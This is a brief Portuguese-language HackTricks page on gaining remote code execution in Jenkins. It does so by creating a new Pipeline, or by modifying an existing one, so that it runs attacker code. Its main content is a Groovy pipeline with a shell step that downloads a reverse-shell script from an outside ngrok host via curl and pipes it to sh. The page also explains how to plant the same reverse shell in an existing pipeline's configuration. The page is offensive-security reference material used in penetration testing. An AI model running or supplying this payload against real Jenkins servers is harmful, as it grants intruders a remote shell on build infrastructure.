Jenkins RCE Criando/Modificando Pipeline

Reading time: 2 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Criando um novo Pipeline

Em "Novo Item" (acessível em /view/all/newJob) selecione Pipeline:

Na seção Pipeline escreva o reverse shell:

groovy
pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Finalmente clique em Salvar e Construir Agora e o pipeline será executado:

Modificando um Pipeline

Se você puder acessar o arquivo de configuração de algum pipeline configurado, você pode modificá-lo adicionando seu reverse shell e então executá-lo ou esperar até que ele seja executado.

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks